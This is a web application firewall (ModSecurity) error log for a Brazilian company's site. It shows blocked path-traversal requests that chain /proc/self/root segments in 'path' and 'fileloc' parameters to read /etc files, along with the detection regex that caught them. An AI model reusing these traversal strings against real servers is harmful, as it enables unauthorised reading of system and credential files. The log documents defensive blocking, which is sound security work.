[Tue Mar 17 11:06:26.110935 2026] [:error] [pid 9299:tid 140411607643904] [client 74.7.228.16:49584] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ablf4r-sgTmmJoPuMdyoFwAAAtA"]
[Tue Mar 17 11:06:27.187201 2026] [:error] [pid 11293:tid 140411540502272] [client 74.7.243.203:52656] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablf49CmCSWTlPouqorVowAAANg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:06:31.944639 2026] [:error] [pid 9299:tid 140411674785536] [client 74.7.243.203:56540] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablf57-sgTmmJoPuMdyoIwAAAsg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:06:33.431419 2026] [:error] [pid 2473:tid 140411574073088] [client 74.7.241.46:35142] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/.pwd.lock"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablf6aBJNF7axNlVR0UGBQAAABQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:06:34.327012 2026] [:error] [pid 8856:tid 140411649607424] [client 74.7.243.203:44708] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablf6nUHeC6oxrTQ0VC3fgAAAcs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:06:35.655820 2026] [:error] [pid 2325:tid 140411540502272] [client 74.7.243.203:44716] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablf6-82sZHvlq4xgHrNawAAApg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:06:37.050461 2026] [:error] [pid 2325:tid 140411632822016] [client 74.7.243.203:44720] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablf7e82sZHvlq4xgHrNbQAAAo0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:06:38.223622 2026] [:error] [pid 9155:tid 140411582465792] [client 74.7.243.203:44722] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablf7tbI7zhHXcabyMUuowAAAlM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:06:39.574916 2026] [:error] [pid 18709:tid 140411540502272] [client 74.7.243.203:44736] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablf7zarLhPAjZGI1b24AQAAA5g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:06:40.827737 2026] [:error] [pid 18709:tid 140411565680384] [client 74.7.243.203:34164] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablf8DarLhPAjZGI1b24AwAAA5U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:06:41.110687 2026] [:error] [pid 18709:tid 140411548894976] [client 74.7.243.203:34164] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablf8TarLhPAjZGI1b24BAAAA5c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:06:42.437462 2026] [:error] [pid 1016:tid 140411582465792] [client 74.7.243.203:34172] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablf8pqmL8PQht4WJFlQ4AAAAVM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:06:45.660108 2026] [:error] [pid 7437:tid 140411599251200] [client 74.7.243.203:34176] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablf9QeiSKl8TjouI-YKdAAAA9E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:06:47.018113 2026] [:error] [pid 8856:tid 140411641214720] [client 74.7.243.203:34184] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablf93UHeC6oxrTQ0VC3gAAAAcw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:06:48.329215 2026] [:error] [pid 1016:tid 140411557287680] [client 74.7.243.203:34196] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablf-JqmL8PQht4WJFlQ5AAAAVY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:06:49.512943 2026] [:error] [pid 11293:tid 140411632822016] [client 74.7.243.203:34200] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablf-dCmCSWTlPouqorVqwAAAM0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:06:53.506018 2026] [:error] [pid 8856:tid 140411582465792] [client 74.7.243.203:41944] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablf_XUHeC6oxrTQ0VC3hgAAAdM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:06:54.859570 2026] [:error] [pid 18380:tid 140411574073088] [client 74.7.243.203:41958] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablf_q4xEDsg_V3ESNY9LQAAAhQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:06:56.043035 2026] [:error] [pid 2325:tid 140411540502272] [client 74.7.243.203:41968] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablgAO82sZHvlq4xgHrNcAAAApg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:06:57.398868 2026] [:error] [pid 1016:tid 140411725141760] [client 74.7.243.203:41978] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablgAZqmL8PQht4WJFlQ7AAAAUI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:06:58.614826 2026] [:error] [pid 11293:tid 140411691570944] [client 74.7.243.203:41986] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablgAtCmCSWTlPouqorVtQAAAMY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:07:03.816644 2026] [:error] [pid 18380:tid 140411666392832] [client 74.7.243.203:41998] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablgBq4xEDsg_V3ESNY9NAAAAgk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
